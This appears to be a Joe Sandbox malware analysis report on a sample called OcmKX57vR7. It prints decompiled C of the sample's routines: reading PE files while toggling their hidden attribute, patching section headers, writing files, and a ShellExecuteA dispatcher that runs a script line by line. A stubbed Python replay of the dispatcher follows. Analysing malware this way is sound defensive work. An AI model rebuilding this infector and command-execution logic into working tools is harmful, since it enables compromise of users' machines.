• Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
Yara matches
Similarity
• API ID: Close$AttributesEnumFileOpenValue___ascii_stricmplstrlen
• String ID: $"$PromptOnSecureDesktop
• API String ID: 4293430545-98143240
• Opcode ID: d919dbd9af1343ac96c8c832437364b04d25ba813f015b914b967c8048a51357
• Instruction ID: bdd769efad709bd93da993ba4a974553bca105625a5613f565cdc8f40f8c6bf1
• Opcode Fuzzy Hash: d919dbd9af1343ac96c8c832437364b04d25ba813f015b914b967c8048a51357
• Instruction Fuzzy Hash: 8FB17F71D0820ABAEB159FA1DC45BEF77B8AB04304F10047BF501F61D1EB79AA94CB69
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph (basic blocks 0x40675c-0x406986 of the function below; graph rendering and executed/not-executed colouring not reproduced here)
C-Code - Quality: 100%
// Reads a PE file from disk into a heap buffer and returns that buffer, writing the
// number of bytes read to *_a8. The decompiler's stack slots are annotated below with
// the PE header fields they correspond to (offsets are standard IMAGE_* layout).
E0040675C(CHAR* _a4, long* _a8, long _a12) {
    long _v8;                      // bytes read / buffer size
    void* _v12;                    // file handle
    struct _OVERLAPPED* _v16;      // output buffer
    long _v20;
    struct _OVERLAPPED* _v24;      // section index
    long _v28;
    intOrPtr _v48;                 // _v68 + 0x14: IMAGE_SECTION_HEADER.PointerToRawData
    intOrPtr _v52;                 // _v68 + 0x10: IMAGE_SECTION_HEADER.SizeOfRawData
    intOrPtr _v60;                 // _v68 + 0x08: IMAGE_SECTION_HEADER.VirtualSize
    void _v68;                     // one 0x28-byte IMAGE_SECTION_HEADER
    long _v72;                     // _v132 + 0x3c: IMAGE_DOS_HEADER.e_lfanew
    void _v132;                    // 0x40-byte IMAGE_DOS_HEADER
    intOrPtr _v320;                // _v380 + 0x3c: IMAGE_OPTIONAL_HEADER.FileAlignment
    signed int _v360;              // _v380 + 0x14: IMAGE_FILE_HEADER.SizeOfOptionalHeader
    signed int _v374;              // _v380 + 0x06: IMAGE_FILE_HEADER.NumberOfSections
    void _v380;                    // 0xf8-byte IMAGE_NT_HEADERS
    void* _t85;
    long _t88;
    int _t92;
    long _t93;
    int _t96;
    long _t99;
    long _t102;
    struct _OVERLAPPED* _t103;
    long _t104;
    long _t115;
    long _t120;
    signed int _t143;
    void* _t146;

    _v16 = 0;
    _v8 = 0;
    if(_a12 != 0) {
        SetFileAttributesA(_a4, 0x80); // FILE_ATTRIBUTE_NORMAL: temporarily un-hide the file
    }
    _t85 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 0x80, 0); // executed; GENERIC_READ, share R/W, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL
    _v12 = _t85;
    if(_t85 == 0xffffffff) {
        _v12 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 4, 0); // retry with FILE_ATTRIBUTE_SYSTEM
    }
    if(_a12 != 0) {
        SetFileAttributesA(_a4, 2); // FILE_ATTRIBUTE_HIDDEN: re-hide the file
    }
    if(_v12 != 0xffffffff) {
        _t88 = GetFileSize(_v12, 0);
        _v8 = _t88;
        if(_t88 == 0xffffffff || _t88 == 0) {
            L31:
            _v8 = 0;
        } else {
            _a12 = 0;
            _v28 = 0;
            _t92 = ReadFile(_v12,  &_v132, 0x40,  &_a12, 0); // executed; read the DOS header
            if(_t92 == 0) {
                goto L31;
            } else {
                _t93 = SetFilePointer(_v12, _v72, 0, 0); // executed; seek to e_lfanew (NT headers)
                if(_t93 == 0xffffffff) {
                    goto L31;
                } else {
                    _t96 = ReadFile(_v12,  &_v380, 0xf8,  &_v28, 0); // executed; read the NT headers
                    if(_t96 == 0) {
                        goto L31;
                    } else {
                        // section table = e_lfanew + sizeof(Signature + FILE_HEADER) (0x18) + SizeOfOptionalHeader
                        _t99 = SetFilePointer(_v12, (_v360 & 0x0000ffff) + _v72 + 0x18, 0, 0); // executed
                        if(_t99 == 0xffffffff) {
                            goto L31;
                        } else {
                            _v20 = 0; // largest on-disk end offset seen over all sections
                            _v24 = 0;
                            if(0 < _v374) {
                                while(1) {
                                    _t115 = 0x28;
                                    _a12 = _t115;
                                    if(ReadFile(_v12,  &_v68, _t115,  &_a12, 0) == 0) { // one section header
                                        break;
                                    }
                                    _t143 = _v374 & 0x0000ffff;
                                    if(_v24 != _t143 - 1) {
                                        _t120 = _v48 + _v52; // PointerToRawData + SizeOfRawData
                                    } else {
                                        // last section: PointerToRawData + VirtualSize rounded up to FileAlignment
                                        _t120 = (_v320 + _v60 - 0x00000001 &  !(_v320 - 1)) + _v48;
                                    }
                                    _a12 = _t120;
                                    if(_v20 < _t120) {
                                        _v20 = _t120;
                                    }
                                    _v24 = _v24 + 1;
                                    if(_v24 < _t143) {
                                        continue;
                                    } else {
                                    }
                                    goto L23;
                                }
                                _v8 = 0;
                            }
                            L23:
                            if(_v24 >= (_v374 & 0x0000ffff)) {
                                _t102 = _v20;
                                if(_v8 > _t102) {
                                    _v8 = _t102; // buffer size = min(file size, largest section end)
                                }
                                _t103 = E0040EBCC(_v8); // allocation helper elsewhere in the sample; 0 on failure
                                _v16 = _t103;
                                if(_t103 == 0) {
                                    goto L31;
                                } else {
                                    _t104 = SetFilePointer(_v12, 0, 0, 0); // executed; rewind to the start of the file
                                    if(_t104 == 0xffffffff) {
                                        L30:
                                        _v8 = 0;
                                        E0040EC2E(_v16); // release the buffer on failure
                                        _v16 = 0;
                                    } else {
                                        _t146 = _v16;
                                        if(ReadFile(_v12, _t146, _v8,  &_v20, 0) == 0) { // read the whole image into the buffer
                                            goto L30;
                                        } else {
                                            // patch the last section header inside the buffer:
                                            // SizeOfRawData (+0x10) = VirtualSize (+0x08) rounded up to FileAlignment
                                             *(((_v374 & 0x0000ffff) - 1) * 0x28 + (_v360 & 0x0000ffff) + _v72 + _t146 + 0x18 + 0x10) =  *((intOrPtr*)(((_v374 & 0x0000ffff) - 1) * 0x28 + (_v360 & 0x0000ffff) + _v72 + _t146 + 0x18 + 8)) + _v320 - 0x00000001 &  !(_v320 - 1);
                                            _v8 = _v20;
                                        }
                                    }
                                }
                            }
                        }
                    }
                }
            }
        }
        FindCloseChangeNotification(_v12); // executed; closes the file handle
    }
     *_a8 = _v8;
    return _v16;
			}

                                                                                                                                  APIs
                                                                                                                                  • SetFileAttributesA.KERNEL32(?,00000080,?,761B43E0,00000000), ref: 0040677E
                                                                                                                                  • CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000,?,761B43E0,00000000), ref: 0040679A
                                                                                                                                  • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000004,00000000,?,761B43E0,00000000), ref: 004067B0
                                                                                                                                  • SetFileAttributesA.KERNEL32(?,00000002,?,761B43E0,00000000), ref: 004067BF
                                                                                                                                  • GetFileSize.KERNEL32(000000FF,00000000,?,761B43E0,00000000), ref: 004067D3
                                                                                                                                  • ReadFile.KERNELBASE(000000FF,?,00000040,00408244,00000000,?,761B43E0,00000000), ref: 00406807
                                                                                                                                  • SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000,?,761B43E0,00000000), ref: 0040681F
                                                                                                                                  • ReadFile.KERNELBASE(000000FF,?,000000F8,?,00000000,?,761B43E0,00000000), ref: 0040683E
                                                                                                                                  • SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000,?,761B43E0,00000000), ref: 0040685C
                                                                                                                                  • ReadFile.KERNEL32(000000FF,?,00000028,00408244,00000000,?,761B43E0,00000000), ref: 0040688B
                                                                                                                                  • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000000,?,761B43E0,00000000), ref: 00406906
                                                                                                                                  • ReadFile.KERNEL32(000000FF,004121A8,00000000,00408244,00000000,?,761B43E0,00000000), ref: 0040691C
                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(000000FF,?,761B43E0,00000000), ref: 00406971
                                                                                                                                    • Part of subcall function 0040EC2E: GetProcessHeap.KERNEL32(00000000,'@,00000000,0040EA27,00000000), ref: 0040EC41
                                                                                                                                    • Part of subcall function 0040EC2E: HeapFree.KERNEL32(00000000), ref: 0040EC48
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Read$Pointer$AttributesCreateHeap$ChangeCloseFindFreeNotificationProcessSize
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1400801100-0
                                                                                                                                  • Opcode ID: d05b9ef8185a7d6987771a176bb27021890da5eba797bb42cdabcd388c34deb0
                                                                                                                                  • Instruction ID: 23622665348289c9bdc7ba1e7bdf6275147e3319f3664adf7917ee5564634b96
                                                                                                                                  • Opcode Fuzzy Hash: d05b9ef8185a7d6987771a176bb27021890da5eba797bb42cdabcd388c34deb0
                                                                                                                                  • Instruction Fuzzy Hash: E47109B1D00219EFDB109FA5CC809EEBBB9FB04314F11457AF516B6290E7349EA2DB54
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 00AD024D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                  • String ID: cess$kernel32.dll
                                                                                                                                  • API String ID: 4275171209-1230238691
                                                                                                                                  • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                  • Instruction ID: f99b96d0982748643ea66c72dc06caae63c068747a6799b1f271543d39d051be
                                                                                                                                  • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                  • Instruction Fuzzy Hash: AC525974A012299FDB64CF58C985BACBBB1BF09304F1480DAE94DAB351DB30AE95DF14
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  C-Code - Quality: 46%
                                                                                                                                  			E004099D2(int __edx, void* __eflags, CHAR* _a4, CHAR* _a8, CHAR* _a12, intOrPtr _a16, int _a20) {
                                                                                                                                  				signed int _t14;
                                                                                                                                  				void* _t21;
                                                                                                                                  				CHAR* _t22;
                                                                                                                                  				void* _t24;
                                                                                                                                  				int _t25;

				_t25 = __edx;
				_t22 = _a8;
				lstrcpyA(_t22, _a4);
				E00408274(_t22);
				_push(0);
				_push(_a12);
				_t14 = E00406C6F((E0040ECA5() & 0x0000000f) << 0x00000014 | 0x00005e0d);
				_pop(_t24);
				_push(_t14 ^ 0x5e5e5e5e);
				E0040F133();
				lstrcatA(_a12, E00402544(0x4122f8, 0x410694, 5, 0xe4, 0xc8));
				E0040EE2A(_t24, 0x4122f8, 0, 0x100);
				lstrcatA(_t22, _a12);
				_t21 = E00406A60(_t25, _t22, _a16, _a20); // executed
				return _t21;
			}

APIs
• lstrcpyA.KERNEL32(?,?,00000100,PromptOnSecureDesktop,00000000,?,00409E9D,?,00000022,?,?,?,?,?,?,?), ref: 004099DF
• lstrcatA.KERNEL32(00000022,00000000,?,?,00409E9D,?,00000022,?,?,?,?,?,?,?,000001F4), ref: 00409A3C
• lstrcatA.KERNEL32(?,00000022,?,?,?,?,?,00409E9D,?,00000022,?,?,?), ref: 00409A52
  • Part of subcall function 00406A60: CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,761F81D0,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406A7D
  • Part of subcall function 00406A60: GetDiskFreeSpaceA.KERNELBASE(00409E9D,00409A60,?,?,?,PromptOnSecureDesktop,?,?,?,00409A60,?,?,00409E9D), ref: 00406ABB
  • Part of subcall function 00406A60: GetLastError.KERNEL32(?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B40
  • Part of subcall function 00406A60: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B4E
  • Part of subcall function 00406A60: DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B80
Strings
Memory Dump Source
• Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
Yara matches
Similarity
• API ID: Filelstrcat$CloseCreateDeleteDiskErrorFreeHandleLastSpacelstrcpy
• String ID: PromptOnSecureDesktop
• API String ID: 4131120076-2980165447
• Opcode ID: db0254336d7d464b5d9db0b354e918c6608a6464c5c4443ee0d461099338c0f8
• Instruction ID: bdd0e4aeb617a5e371eea751ca6e82beed5a5e384e9917b0f8373ebabf2fcd57
• Opcode Fuzzy Hash: db0254336d7d464b5d9db0b354e918c6608a6464c5c4443ee0d461099338c0f8
• Instruction Fuzzy Hash: 8D01A27294020877EA103F62EC47F9F3F1DEB44718F00483AF619790D2D9BA95709AAC
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
C-Code - Quality: 100%
			E00404000(CHAR* _a4, signed int* _a8) {
				void* _t3;
				long _t6;
				void* _t8;
				signed int* _t9;

				_t9 = _a8;
				_t8 = 0;
				 *_t9 =  *_t9 | 0xffffffff;
				while(1) {
					_t3 = CreateFileA(_a4, 0xc0000000, 3, 0, 3, 0x40000080, 0); // executed
					if(_t3 != 0xffffffff) {
						break;
					}
					_t6 = GetLastError();
					if(_t6 == 2 || _t6 == 3) {
						L6:
						return 0;
					} else {
						if(_t6 == 5) {
							L9:
							return 1;
						}
						Sleep(0x1f4);
						_t8 = _t8 + 1;
						if(_t8 < 0xa) {
							continue;
						}
						goto L6;
					}
				}
				 *_t9 = _t3;
				goto L9;
			}

APIs
• CreateFileA.KERNELBASE(40000080,C0000000,00000003,00000000,00000003,40000080,00000000,00000001,PromptOnSecureDesktop,004042B6,00000000,00000001,PromptOnSecureDesktop,00000000,?,004098FD), ref: 00404021
• GetLastError.KERNEL32(?,004098FD,00000001,00000100,PromptOnSecureDesktop,0040A3C7), ref: 0040402C
• Sleep.KERNEL32(000001F4,?,004098FD,00000001,00000100,PromptOnSecureDesktop,0040A3C7), ref: 00404046
Strings
Memory Dump Source
• Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
Yara matches
Similarity
• API ID: CreateErrorFileLastSleep
• String ID: PromptOnSecureDesktop
• API String ID: 408151869-2980165447
• Opcode ID: 6f680220710ad79833a0587a74a8d4d803d4b32c880204d479e51cf724750932
• Instruction ID: 3804347f6bd7ba573f3b83e06e35dce69dd086f5e0a34025cfebbc3953b0dfe0
• Opcode Fuzzy Hash: 6f680220710ad79833a0587a74a8d4d803d4b32c880204d479e51cf724750932
• Instruction Fuzzy Hash: 05F0A771240101AAD7311B24BC49B5B36A1DBC6734F258B76F3B5F21E0C67458C19B1D
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
C-Code - Quality: 97%
			E00406987(void* __ecx, void* _a4, void* _a8, intOrPtr _a12, signed int _a16) {
				long _v8;
				long _v12;
				signed int _t50;
				int _t52;
				signed int _t53;
				int _t59;
				signed int _t60;
				long _t68;
				signed int _t74;
				void* _t78;
				void* _t85;

				_t78 = _a8;
				_t48 =  *((intOrPtr*)(_t78 + 0x3c)) + _t78;
				_t7 =  &_a16; // 0x406b2c
				_t85 = (( *( *((intOrPtr*)(_t78 + 0x3c)) + _t78 + 6) & 0x0000ffff) - 1) * 0x28 + ( *(_t48 + 0x14) & 0x0000ffff) + _t48 + 0x18;
				_t68 =  *(_t85 + 0x14);
				_t50 =  *_t7 - _t68;
				_v8 = _t50;
				if(_t68 >= _a12) {
					L5:
					_a16 = _a16 & 0x00000000;
				} else {
					_t74 =  *(_t85 + 0x10);
					if(_t74 == 0) {
						goto L5;
					} else {
						_v12 = _t74;
						_a16 = _t50 / _t74;
						if(_a16 < 1) {
							_a16 = 1;
						}
						_t20 =  &_a16; // 0x406b2c
						 *(_t85 + 0x10) =  *_t20 * _t74;
					}
				}
				_v8 = _v8 & 0x00000000;
				_t52 = WriteFile(_a4, _t78, _t68,  &_v8, 0); // executed
				if(_t52 == 0 || _v8 != _t68) {
					if(_a16 != 0) {
						 *(_t85 + 0x10) = _v12;
					}
					_t53 = 0;
				} else {
					if(_a16 == 0) {
						L13:
						_t53 = _t68;
					} else {
						 *(_t85 + 0x10) = _v12;
						while(1) {
							_v8 = _v8 & 0x00000000;
							_t59 = WriteFile(_a4, _a8 +  *(_t85 + 0x14), _v12,  &_v8, 0); // executed
							_t60 = _v8;
							if(_t59 == 0 || _t60 != _v12) {
								break;
							}
							_t68 = _t68 + _t60;
							_t41 =  &_a16;
							 *_t41 = _a16 - 1;
							if( *_t41 != 0) {
								continue;
							} else {
								goto L13;
							}
							goto L18;
						}
						asm("sbb eax, eax");
						_t53 =  !_t60 & _t68 + _t60;
					}
				}
                                                                                                                                  				L18:
                                                                                                                                  				return _t53;
			}

• Instruction addresses (the address column of the listing above, detached by extraction): 0x0040698f through 0x00406a5f, with non-executed blocks shown as 0x00000000.

                                                                                                                                  APIs
                                                                                                                                  • WriteFile.KERNELBASE(00409A60,?,?,00000000,00000000,00409A60,?,00000000), ref: 004069F9
                                                                                                                                  • WriteFile.KERNELBASE(00409A60,?,00409A60,00000000,00000000), ref: 00406A27
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileWrite
                                                                                                                                  • String ID: ,k@
                                                                                                                                  • API String ID: 3934441357-1053005162
                                                                                                                                  • Opcode ID: e4aff9389b963f63373f6495f6f2d31144d691977fa3f05a849364ed3536fcbf
                                                                                                                                  • Instruction ID: 2e4882fff751b5905bcc38bfa2cd4d67bf9c642b42fdf425c00f27fbfd993b21
                                                                                                                                  • Opcode Fuzzy Hash: e4aff9389b963f63373f6495f6f2d31144d691977fa3f05a849364ed3536fcbf
                                                                                                                                  • Instruction Fuzzy Hash: 3A313A72A00209EFDB24DF58D984BAA77F4EB44315F12847AE802F7680D374EE64CB65
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

Control-flow Graph

• Executed / Not Executed legend of the graph image; control_flow_graph: basic blocks 416930 through 416dcb, with calls to 40c125 and 41bc00 (edge list omitted).
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279779724.0000000000415000.00000020.00000001.01000000.00000003.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_415000_OcmKX57vR7.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b5666b7de09cf01aae8cce74cc5509ea24d439d8651653c25499f854a2baff1a
                                                                                                                                  • Instruction ID: 09d6e81fcf76da4e43cf60b9f69bcbf2c181d9feaad62054433ac42e5f9b529a
                                                                                                                                  • Opcode Fuzzy Hash: b5666b7de09cf01aae8cce74cc5509ea24d439d8651653c25499f854a2baff1a
                                                                                                                                  • Instruction Fuzzy Hash: 7BE10B74E04248CFDB24CFA8C894BADBBB1FB49314F25825ED8656B392D7359882CF45
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

Control-flow Graph

• Executed / Not Executed legend of the graph image; control_flow_graph: basic blocks 4091eb through 409324, with calls to 40ed03, 40ee08, Sleep and ShellExecuteA (edge list omitted).
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E004091EB(char* _a4, char* _a8) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				char _v524;
                                                                                                                                  				char _t24;
                                                                                                                                  				char* _t25;
                                                                                                                                  				void* _t27;
                                                                                                                                  				intOrPtr* _t29;
                                                                                                                                  				char* _t31;
                                                                                                                                  				char _t34;
                                                                                                                                  				intOrPtr _t40;
                                                                                                                                  				void* _t41;
                                                                                                                                  				char* _t42;
                                                                                                                                  				void* _t44;
                                                                                                                                  				void* _t45;
                                                                                                                                  				void* _t46;
                                                                                                                                  
                                                                                                                                  				_v12 = _v12 & 0x00000000;
                                                                                                                                  				_t42 = _a8;
                                                                                                                                  				_v8 = 0x10;
                                                                                                                                  				if( *_t42 == 0) {
                                                                                                                                  					L33:
                                                                                                                                  					return _v12;
                                                                                                                                  				} else {
                                                                                                                                  					goto L1;
                                                                                                                                  				}
                                                                                                                                  				do {
                                                                                                                                  					L1:
                                                                                                                                  					_t31 = E0040ED03(_t42, 0xd);
                                                                                                                                  					if(_t31 != 0) {
                                                                                                                                  						L6:
                                                                                                                                  						_t44 = _t31 - _t42;
                                                                                                                                  						if(_t44 >= 0x200) {
                                                                                                                                  							_t44 = 0x1ff;
                                                                                                                                  						}
                                                                                                                                  						E0040EE08( &_v524, _t42, _t44);
                                                                                                                                  						_t46 = _t46 + 0xc;
                                                                                                                                  						 *((char*)(_t45 + _t44 - 0x208)) = 0;
                                                                                                                                  						if(_v524 == 0) {
                                                                                                                                  							goto L27;
                                                                                                                                  						} else {
                                                                                                                                  							_t25 =  &_v524;
                                                                                                                                  							if(_v524 != 0x20) {
                                                                                                                                  								L16:
                                                                                                                                  								while( *_t25 == 0x22) {
                                                                                                                                  									while(1) {
                                                                                                                                  										_t25 =  &(_t25[1]);
                                                                                                                                  										_t34 =  *_t25;
                                                                                                                                  										if(_t34 == 0) {
                                                                                                                                  											break;
                                                                                                                                  										}
                                                                                                                                  										if(_t34 == 0x22) {
                                                                                                                                  											L15:
                                                                                                                                  											_t25 =  &(_t25[1]);
                                                                                                                                  											goto L16;
                                                                                                                                  										}
                                                                                                                                  									}
                                                                                                                                  									if(_t34 != 0x22) {
                                                                                                                                  										L20:
                                                                                                                                  										while( *_t25 != 0) {
                                                                                                                                  											if( *_t25 == 0x20) {
                                                                                                                                  												L22:
                                                                                                                                  												 *_t25 = 0;
                                                                                                                                  												do {
                                                                                                                                  													_t25 =  &(_t25[1]);
                                                                                                                                  												} while ( *_t25 == 0x20);
                                                                                                                                  												L26:
                                                                                                                                  												_t27 = ShellExecuteA(0, _a4,  &_v524, _t25, 0, 0); // executed
                                                                                                                                  												_v12 = _t27;
                                                                                                                                  												if(_t27 != 0x2a) {
                                                                                                                                  													 *0x412180 = _v8 | 0x5e0d0100;
                                                                                                                                  													 *0x41217c = _t27;
                                                                                                                                  													return _t27;
                                                                                                                                  												} else {
                                                                                                                                  													goto L27;
                                                                                                                                  												}
                                                                                                                                  												while(1) {
                                                                                                                                  													L27:
                                                                                                                                  													_t24 =  *_t31;
                                                                                                                                  													if(_t24 != 0xd && _t24 != 0xa) {
                                                                                                                                  														goto L30;
                                                                                                                                  													}
                                                                                                                                  													_t31 = _t31 + 1;
                                                                                                                                  												}
                                                                                                                                  												goto L30;
                                                                                                                                  											}
                                                                                                                                  											_t25 =  &(_t25[1]);
                                                                                                                                  										}
                                                                                                                                  										if( *_t25 != 0x20) {
                                                                                                                                  											_t25 = 0;
                                                                                                                                  											goto L26;
                                                                                                                                  										}
                                                                                                                                  										goto L22;
                                                                                                                                  									}
                                                                                                                                  									goto L15;
                                                                                                                                  								}
                                                                                                                                  								goto L20;
                                                                                                                                  							} else {
                                                                                                                                  								goto L10;
                                                                                                                                  							}
                                                                                                                                  							do {
                                                                                                                                  								L10:
                                                                                                                                  								_t25 =  &(_t25[1]);
                                                                                                                                  							} while ( *_t25 == 0x20);
                                                                                                                                  							goto L16;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					_t31 = E0040ED03(_t42, 0xa);
                                                                                                                                  					if(_t31 != 0) {
                                                                                                                                  						goto L6;
                                                                                                                                  					}
                                                                                                                                  					_t29 = _t42;
                                                                                                                                  					_t5 = _t29 + 1; // 0x409689
                                                                                                                                  					_t41 = _t5;
                                                                                                                                  					do {
                                                                                                                                  						_t40 =  *_t29;
                                                                                                                                  						_t29 = _t29 + 1;
                                                                                                                                  					} while (_t40 != 0);
                                                                                                                                  					_t31 = _t29 - _t41 + _t42;
                                                                                                                                  					goto L6;
                                                                                                                                  					L30:
                                                                                                                                  					_t42 = _t31;
                                                                                                                                  					if( *_t31 != 0) {
                                                                                                                                  						Sleep(0x1f4); // executed
                                                                                                                                  					}
                                                                                                                                  					_v8 = _v8 + 1;
                                                                                                                                  				} while ( *_t31 != 0);
                                                                                                                                  				goto L33;
                                                                                                                                  			}
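The fragment above is the sample's line-by-line command dispatcher: E0040ED03(buf, 0xa) locates the next line feed (or the loop falls back to a strlen walk to the end of the buffer), the line held in the local buffer _v524 is split at its first space into lpFile and lpParameters (no space gives a NULL lpParameters, the `_t25 = 0` branch), ShellExecuteA is called with the caller-supplied verb _a4, and a result other than 0x2a stops the loop, storing the line counter _v8 OR'ed with 0x5e0d0100 at 0x412180 and the return value at 0x41217c. On success the run of CR/LF bytes is skipped and Sleep(0x1f4) pauses 500 ms only when more script follows. Two details worth noting: the success test is `!= 0x2a` (42, the HINSTANCE value ShellExecute typically returns on success) rather than the documented `> 32`, and the 500 ms pacing between lines is a timing artefact a sandbox trace can key on. The Python below is an added example, not code from the report or the sample, that replays that parsing and stop-on-failure logic against a constructed script with ShellExecuteA replaced by a caller-supplied callback so nothing is executed. That E0040ED03 behaves like strchr and that a CR preceding the LF is not passed on to ShellExecuteA are assumptions; SAMPLE_SCRIPT is constructed, not recovered from the sample.

```python
from typing import Callable, List, Optional, Tuple

# Constants lifted from the decompiled loop above
SHELL_EXECUTE_OK = 0x2A      # HINSTANCE value the sample expects back from ShellExecuteA
LINE_DELAY_MS = 0x1F4        # Sleep(500) between script lines
ERROR_TAG = 0x5E0D0100       # OR'ed into the line counter stored at 0x412180 on failure

Executor = Callable[[str, Optional[str]], int]


def split_command_line(line: str) -> Tuple[str, Optional[str]]:
    """lpFile is everything before the first space; lpParameters is the rest with
    the run of separating spaces removed. A line without a space yields
    lpParameters = None (the `_t25 = 0` branch before L26)."""
    idx = line.find(" ")
    if idx < 0:
        return line, None
    return line[:idx], line[idx:].lstrip(" ")


def run_script(script: str, executor: Executor,
               sleep: Callable[[int], None] = lambda ms: None) -> dict:
    """Replay the dispatch loop: one executor call per line, stop at the first
    result != 0x2a and report the failing line the way the sample stores it.
    `executor` stands in for ShellExecuteA(NULL, lpOperation, lpFile, lpParameters,
    NULL, 0); lpOperation is the function's own argument (_a4), not visible here."""
    calls: List[Tuple[int, str, Optional[str], int]] = []
    pos, line_no = 0, 0
    while pos < len(script):
        # Assumption: E0040ED03(buf, 0xa) is strchr(buf, '\n'); with no newline the
        # sample walks to the terminating NUL instead.
        nl = script.find("\n", pos)
        end = len(script) if nl < 0 else nl
        # Assumption: a CR before the LF is not handed to ShellExecuteA.
        line = script[pos:end].rstrip("\r").lstrip(" ")   # leading spaces: the L10 loop
        file_, params = split_command_line(line)
        rc = executor(file_, params)
        calls.append((line_no, file_, params, rc))
        if rc != SHELL_EXECUTE_OK:
            return {"ok": False, "calls": calls,
                    "error_line": line_no | ERROR_TAG, "error_code": rc}
        # L27: step over the run of CR/LF bytes that terminates the line
        pos = end
        while pos < len(script) and script[pos] in "\r\n":
            pos += 1
        if pos < len(script):          # Sleep(0x1f4) only when more script follows
            sleep(LINE_DELAY_MS)
        line_no += 1
    return {"ok": True, "calls": calls, "error_line": None, "error_code": None}


# Constructed sample script (not recovered from the sample); the fourth line fails.
SAMPLE_SCRIPT = ("cmd.exe /c whoami\r\n"
                 "  ipconfig.exe   /all\r\n"
                 "notepad.exe\r\n"
                 "bad.exe /x\r\n"
                 "calc.exe\r\n")


def dry_run(script: str = SAMPLE_SCRIPT) -> dict:
    """Executor stub: accepts anything except bad.exe, which gets SE_ERR_NOASSOC (31)."""
    sleeps: List[int] = []
    result = run_script(script,
                        lambda f, p: 0x1F if f == "bad.exe" else SHELL_EXECUTE_OK,
                        sleeps.append)
    result["sleeps_ms"] = sleeps
    return result


if __name__ == "__main__":
    r = dry_run()
    for call in r["calls"]:
        print(call)
    print("stored error slots:", hex(r["error_line"]), r["error_code"], "sleeps:", r["sleeps_ms"])
```

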